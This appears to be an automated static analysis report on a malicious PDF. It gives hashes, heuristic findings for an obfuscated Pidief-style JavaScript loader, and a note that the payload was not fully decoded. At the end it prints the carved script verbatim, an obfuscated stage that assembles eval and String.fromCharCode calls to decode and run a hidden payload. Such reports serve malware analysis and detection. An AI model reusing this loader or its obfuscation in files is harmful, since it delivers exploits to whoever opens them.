Malicious PDF — malware analysis report

Static analysis result for SHA-256 32c77187a32978f3…

Verdict: MALICIOUS
File type: PDF
Size: 44.6 KB
Authoring application: substr
First seen: 2012-10-18
MD5: de9b5b490011f3da0bdb24d0a9fba000
SHA-1: 2ca1713cdbe584da7f01346131c1527704f52d9a
SHA-256: 32c77187a32978f3552b89a31058b27076457560500d9b4ec905dd3d4c020163
Risk Score: 86

Malware Insights

MITRE ATT&CK
T1059.007 Scripting: JavaScript

The PDF file contains embedded JavaScript, indicated by heuristic firings for PDF_JAVASCRIPT and PDF_JS. The ML classifier strongly flagged this PDF as malicious. While no specific malicious actions are detailed in the extracted body text or scripts, the presence of JavaScript within a PDF is a common technique for delivering malicious payloads or initiating further compromise. The confidence is high due to the ML score, but the exact payload and family remain unknown without further analysis of the JavaScript.

Machine Learning

  • Nyx PDF Classifier malicious score 1.0000

Heuristics (3)

  • Obfuscated Pidief-style JavaScript loader (stage not decoded) (severity: high; CVE related; rule PDF_PIDIEF_OBFUSCATED_VERSION_GATED_LOADER)
    PDF JavaScript carries a large opaque encoded stage (a letter-delimited numeric character-code array) that is built to be decoded and eval'd, but no exact Adobe Reader CVE could be attributed because the encoding scheme resisted full static decoding. This is the structural fingerprint of the Pidief / multi-CVE exploit-kit loader family — a version-gated obfuscated JavaScript stage with no benign use. Flagged suspicious on its own; an ML/AV signal or a recovered heap-spray pushes it to malicious.
  • JavaScript action (severity: low; 1 related finding; rule PDF_JAVASCRIPT)
    PDF contains a /JavaScript action. Generic JavaScript is common in benign forms; specific dangerous APIs are scored by separate rules.
  • Embedded JS stream (severity: low; rule PDF_JS)
    PDF references a /JS stream. Generic JavaScript is common in benign forms; specific dangerous APIs are scored by separate rules.

Extracted artifacts (1)

Files carved from inside the sample during analysis.

Filename: javascript_obj0001_000.js
Kind: pdf-javascript-stream
Source: PDF /JS object 1 at offset 0xAFA9
Size: 439 bytes
SHA-256: fb582b3ba6afc8a1d0fb19229fe6f9c7f1ea0d2e03f264acaf584550d13bcd75
Preview of the extracted script (first 1,000 lines):
s2='';
v=producer;
t='le';
b='v';
a="e".concat("a","n","b","w",b,"o");
s=a[0].concat(b,a[1],t[0]);
e=v[v]()[s];
nut=e('ti'.concat(v[4],t));
q=nut[v](a.length-6,a.length+2);
raec=e(v[0].toUpperCase().concat(v[4],'ring.f',q[4],a[6],q));
q=nut[v](t.length+12)[e(v[0]+'ubjec'+v[4])]('c');
k=q['len'.concat('gth')];
i=0;
while(i!=k){
	cxn = 1*(q[i]);
	i++;
	cxn -= (-1)*(q[i]);
	s2 = s2.concat(raec(cxn));
	i++;
}
e(s2);